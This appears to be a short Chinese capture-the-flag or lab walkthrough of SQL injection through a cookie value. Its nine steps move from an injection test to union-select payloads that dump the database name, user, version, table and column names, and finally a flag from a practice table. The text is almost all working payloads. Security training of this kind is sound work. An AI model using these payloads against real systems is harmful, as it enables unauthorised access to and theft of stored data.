实战cookie注入

第一步：登录账号，获取cookie

第二步：抓包发送repeater

第三步：测试是否存在注入点
payload:' and 1=1 #

第四步：查看多少张表
payload:' order by 4 #

第五步：查看显示位
payload:-admin' union select 1,2,3 #

第六步：查询数据库名，用户名和版本号
payload:-admin' union select group_concat(database(),user()),version(),3 #

第七步：查出表名
payload:-admin' union select group_concat(table_name),2,3 from information_schema.tables where table_schema='cookie_security' #

第八步：查出列名
payload:-admin' union select group_concat(column_name),2,3 from information_schema.columns where table_schema='cookie_security' and table_name='cookie_flag' #

第九步：查出flag
payload:-admin' union select group_concat(id,value),2,3 from cookie_security.cookie_flag #